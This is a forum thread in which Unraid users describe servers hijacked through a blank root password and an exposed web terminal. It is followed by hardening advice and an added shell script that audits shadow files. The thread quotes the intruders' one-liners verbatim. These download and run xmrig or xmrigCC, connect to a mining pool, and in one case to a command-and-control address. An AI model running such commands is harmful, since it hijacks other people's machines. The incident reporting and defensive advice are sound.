xmrig detected


Zan


Hi there,

A few days ago my server CPU cores were all at 100% - I assumed it was due to an errant docker container and didn't investigate further.

Today, while preparing for a cache drive upgrade, I inadvertently went through bash history and found that the xmrig crypto miner had been installed...

wget https://github.com/xmrig/xmrig/releases/download/v5.5.1/xmrig-5.5.1-xenial-x64.tar.gz && tar xvzf xmrig-5.5.1-xenial-x64.tar.gz && cd xmrig-5.5.1 && ./xmrig -a rx/sfx -o eu-de02.miningrigrentals.com:3333 -u km7670672.145246 -p x --donate-level=1 --tls --retries=10000

This command was executed some time afterwards:

xmrig -a rx/0 -o eu-01.miningrigrentals.com:3333 -u km7670672.145673 -p x --tls --retries=10000

I suspect what had happened was....

1. I upgraded my server to 6.8.1 (unraid-dvb build).

2. After rebooting, I found I couldn't login as root. I don't know whether this was done by a hacker, but I suspected a corruption of the /boot/config/shadow file, as I've had USB stick corruption on other USB sticks in the past. However, the file didn't look corrupted, and even though in a Windows PC the USB stick was reported with errors, when I selected the option to let Windows fix the errors it then reported that no errors were detected/fixed. The USB stick is a Sandisk 16GB stick; I thought this was a reasonably reliable brand/stick.

3. I used instructions on this forum to remove the root user password via a modification to /boot/config/shadow and was able to restart my server, login, and I used passwd from the command line to set the root user password. I didn't actually do any follow-up to confirm that the new password was applied.

4. A few days later I used ssh to login to the server and noticed that no password prompt was displayed, logged into the user page of webui and root user was reported as not set, so I set one.

5. A few days after that I noticed the CPU at 100%, and today noticed the xmrig statements in bash history 😒

 

It looks as though the exploiter was using webterminal to run the wget/xmrig commands above, e.g. http://<myip>:8080/webterminal/

With no root password they would have gotten straight to a command line.

 

Hopefully this sounds plausible to people here, just wondering whether anyone can confirm that using passwd from the command line should have worked to change the root user password. If not, why?

I want to keep the ability to ssh into my server from anywhere, so aside from being more vigilant with my user passwords, can anyone suggest other things to improve the security on my server?

@Squid - perhaps enhance Fix Common Problems to check for blank user passwords?

 

Edited by Zan
Removed my ip from hyperlink
2 minutes ago, itimpi said:

Do you have the whole Unraid server exposed to the internet or have you just port forwarded the port required for ssh?

 

Is there any reason not to use a VPN now that the WireGuard VPN is built into Unraid as that would be far more secure?

1. Just forwarded specific ports

2. I will definitely use WireGuard, just haven't gotten around to it yet.


I think first of all you should make sure you do not make your server directly accessible from the internet. For me it sounds like you have at least port 22 forwarded to your Unraid server in your router. Also make sure that ports 80 and 443 are not directly forwarded to your server. If you want to access your Unraid server on the go, use a VPN to connect to your home. The current Unraid version 6.8.2 has WireGuard built in, or you can use OpenVPN as a Docker, or you could use your router's function as a VPN server. Most of them have these functions built in these days. A simple Raspberry Pi is also an option to build up your VPN server. A couple of weeks ago a user reported in the forum that he found a couple of Unraid servers without password protection online, and if he could find the servers others can do so too. If someone is not actively reading the forums he will not notice this. Not sure if Limetech got extra information from the user who found these servers to maybe contact the customers directly.


I have just found EXACTLY the same thing, meaning it's not a random thing. This was pasted:

 

cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd var/tmp && mkdir t11113211 && cd t11113211 && wget https://github.com/Bendr0id/xmrigCC/releases/download/2.6.2/xmrigCC-2.6.2-with_tls_and_gzip-gcc7-linux-static-amd64.tar.gz && tar xvzf xmrigCC-2.6.2-with_tls_and_gzip-gcc7-linux-static-amd64.tar.gz && rm xmrigCC-2.6.2-with_tls_and_gzip-gcc7-linux-static-amd64.tar.gz && cd miner && chmod u+x xmrigDaemon* && ./xmrigDaemon* -a rx/0 -o eu-de02.miningrigrentals.com:3333 -u km7670672.145673 -p x --tls --retries=10000 --donate-level=1 --cc-url=40.76.222.123:3344 --cc-access-token=GArC5Qrsnjfkyna6CttkuJ

 

On 2/2/2020 at 10:58 AM, Zan said:

Hopefully this sounds plausible to people here, just wondering whether anyone can confirm that using passwd from the command line should have worked to change the root user password. If not, why?

It was not mentioned when the original post was made, but changing the password via the CLI is NOT the way to do it, as that will only change it in RAM and not survive a reboot. The correct way to do this is via the Users tab in the Unraid GUI.
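Two checks that follow from this thread, written as an added example rather than anything posted by Zan, itimpi or Limetech: flag accounts whose shadow entry has an empty password field (what Zan asked Fix Common Problems to look for), and flag accounts whose hash in the live /etc/shadow differs from the copy persisted at /boot/config/shadow, which is how a CLI passwd change that will not survive a reboot shows up. The functions take the file paths as arguments; the shadow lines below are constructed sample data, not real hashes.

```shell
#!/bin/sh
# Added example, not from the thread. Audits shadow-format files.

# Print accounts whose password field (field 2) is empty. "!" and "*" lock an
# account, so only a truly empty field means "log in with no password".
blank_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Print accounts whose hash differs between the live shadow file and the
# persisted one. On Unraid the persisted copy is what survives a reboot, so a
# mismatch means the live password will be lost on restart.
shadow_mismatches() {
    live=$1
    persisted=$2
    awk -F: 'NR == FNR { hash[$1] = $2; next }
             ($1 in hash) && hash[$1] != $2 { print $1 }' "$live" "$persisted"
}

# Constructed sample files: root was set with passwd in RAM (live file has a
# hash) but the persisted copy still has an empty password field.
tmpdir=$(mktemp -d)
cat > "$tmpdir/etc_shadow" <<'EOF'
root:$6$constructedsalt$constructedhash:18294:0:99999:7:::
bin:*:18294:0:99999:7:::
nobody:!:18294:0:99999:7:::
EOF
cat > "$tmpdir/boot_shadow" <<'EOF'
root::18294:0:99999:7:::
bin:*:18294:0:99999:7:::
nobody:!:18294:0:99999:7:::
EOF
SAMPLE_LIVE="$tmpdir/etc_shadow"
SAMPLE_PERSISTED="$tmpdir/boot_shadow"

echo "Accounts with a blank password in the persisted file:"
blank_password_accounts "$SAMPLE_PERSISTED"
echo "Accounts whose password will revert on reboot:"
shadow_mismatches "$SAMPLE_LIVE" "$SAMPLE_PERSISTED"
```

On a real Unraid box the same functions can be pointed at /etc/shadow and /boot/config/shadow; any account printed by either check should be fixed through the Users tab so the change is persisted.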
